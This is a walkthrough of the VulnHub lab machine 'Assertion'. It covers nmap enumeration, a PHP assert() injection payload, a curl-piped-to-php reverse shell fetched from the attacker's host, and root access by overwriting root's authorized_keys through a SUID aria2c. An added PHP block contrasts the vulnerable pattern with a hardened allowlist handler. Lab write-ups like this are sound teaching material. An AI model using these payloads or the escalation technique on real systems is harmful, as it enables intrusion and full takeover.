[VLN] Assertion

Today we are going to hack the VulnHub machine called Assertion. You can download it from the following link: https://www.vulnhub.com/entry/assertion-101,495/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@m0nique:~$ nmap -A -p- 192.168.112.139
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 23:14 CEST
    Nmap scan report for 192.168.112.139
    Host is up (0.0030s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 6e:ce:aa:cc:02:de:a5:a3:58:5d:da:2b:ef:54:07:f9 (RSA)
    |   256 9d:3f:df:16:7a:e1:59:58:84:4a:e3:29:8f:44:87:8d (ECDSA)
    |_  256 87:b5:6f:f8:21:81:d3:3b:43:d0:40:81:c0:e3:69:89 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Assertion
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.05 seconds
    After exploring the website, we see that "index.php?page=" has a somewhat special LFI, caused by the assert function: a single quote in the parameter breaks out of the assertion string and the rest is evaluated as PHP.
    http://192.168.112.139/index.php?page=' and die(system('id')) or '
    Knowing that we can execute commands on the victim, let's prepare a php-reverse-shell.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
    sml@m0nique:~$ mv php-reverse-shell.php rshell.php
    sml@m0nique:~$ nano rshell.php  # set our IP/port
    We start nc listening:
    sml@m0nique:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    And finally we browse to...
    http://192.168.112.139/index.php?page=' and die(system("curl http://192.168.112.128/rshell.php|php")) or '
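    The assert-based LFI above, as an added example that is not the machine's source or the post's own code: the classic pattern of splicing the page parameter into a string that assert() evaluates, beside a hardened handler that uses an allowlist and no assert() at all. The pages/ directory, the file names and the allowlist entries are assumptions.

```php
<?php
// Reconstruction of the vulnerable pattern (assumption: the machine's real
// index.php is not shown in the post; this is the textbook variant).
// assert() with a string argument evaluates it as PHP code (PHP 5 / 7.x),
// so a single quote in $page ends the literal and the rest runs as code:
//   page=' and die(system('id')) or '
function include_page_vulnerable(string $page): void
{
    $file = "pages/" . $page . ".php";
    assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
    include $file;
}

// Hardened form: user input never reaches assert() or any other code
// evaluator, and the page name must match an explicit allowlist.
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // constructed list

function resolve_page(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;   // unknown page: reject, never build a path from it
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . $page . '.php');
    // realpath() resolves symlinks and "..", so a final prefix check also
    // guards against a mistaken allowlist entry.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function include_page_safe(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo "Page not found";
        return;
    }
    include $path;
}

// The payload from the post is simply rejected by the hardened handler:
var_dump(resolve_page("' and die(system('id')) or '"));   // NULL
// Belt and braces for production: zend.assertions = -1 in php.ini, which
// compiles assert() calls out entirely.
```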
  • Low Shell
  • And we're in :)
    sml@m0nique:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.112.128] from (UNKNOWN) [192.168.112.139] 35662
    Linux assertion 4.15.0-74-generic #84-Ubuntu SMP Thu Dec 19 08:06:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
     20:11:10 up  2:03,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    We look for anything with the SUID bit set.
    $ find / -perm -4000 2>/dev/null
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/bin/at
    /usr/bin/aria2c
    /usr/bin/newgrp
    /usr/bin/newgidmap
    /usr/bin/newuidmap
    /usr/bin/passwd
    /usr/bin/pkexec
    /usr/bin/sudo
    /usr/bin/chsh
    /usr/bin/traceroute6.iputils
    /usr/bin/gpasswd
    ---SNIP---
    $
  • Privilege Escalation
  • We find the aria2c binary, which we can use to download a file and overwrite the original as root. We prepare an authorized_keys file containing our public key, then write it to /root/.ssh/authorized_keys: using aria2c we overwrite the original and can log in as root over ssh without a password! We prepare the authorized_keys.
    sml@m0nique:~$ cat ~/.ssh/id_rsa.pub >> /var/www/html/authorized_keys
    Using aria2c, we copy it where we want :)
    www-data@assertion:/$ /usr/bin/aria2c -d /root/.ssh/ -o authorized_keys "http://192.168.112.128/authorized_keys" --allow-overwrite=true

    07/06 20:57:32 [NOTICE] Downloading 1 item(s)

    07/06 20:57:32 [NOTICE] Download complete: /root/.ssh//authorized_keys

    Download Results:
    gid   |stat|avg speed  |path/URI
    ======+====+===========+=======================================================
    d0ed13|OK  |   551KiB/s|/root/.ssh//authorized_keys

    Status Legend:
    (OK):download completed.
    And we try it!
    sml@m0nique:/var/www/html$ ssh root@192.168.112.139
    Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

      System information as of Mon Jul  6 20:57:40 UTC 2020

      System load:  0.01               Processes:            197
      Usage of /:   34.1% of 19.56GB   Users logged in:      0
      Memory usage: 14%                IP address for ens33: 192.168.112.139
      Swap usage:   0%

      => There is 1 zombie process.

     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch

    76 packages can be updated.
    0 updates are security updates.

    Last login: Thu Jan 16 10:38:39 2020
    root@assertion:~#
  • root.txt
  • root@assertion:~# ls
    root.txt
    root@assertion:~# cat root.txt
    8efabdae07730bdcb14d83e37a2e7398
  • End
  • And with that we are root on the machine :)